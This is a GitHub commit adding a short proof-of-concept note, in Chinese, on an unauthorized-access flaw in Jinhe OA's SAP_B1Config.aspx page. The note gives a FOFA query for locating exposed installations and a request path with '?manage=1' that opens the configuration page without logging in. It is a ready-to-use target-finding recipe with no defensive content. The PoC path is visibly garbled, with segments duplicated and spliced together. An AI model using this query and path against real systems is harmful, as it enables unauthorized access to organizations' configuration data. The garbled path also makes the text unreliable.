Create 金和OA_SAP_B1Config.aspx未授权访问漏洞.md

This commit is contained in:
wy876 2024-01-12 19:13:57 +08:00 committed by GitHub
parent 0c7cb9fa1b
commit 10456871d9
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -0,0 +1,13 @@
## 金和OA_SAP_B1Config.aspx未授权访问漏洞
## fofa
```
app="金和网络-金和OA"
```
## poc
```
/C6/JHsoft./C6/JHsoft.CostEAI/SAP_B1Config.aspx/?manage=1CostEAI/SAP_B1Config.aspx/?manage=1
```
![image](https://github.com/wy876/POC/assets/139549762/1f939923-f6bc-4a8f-9a00-8b0fc549a2c7)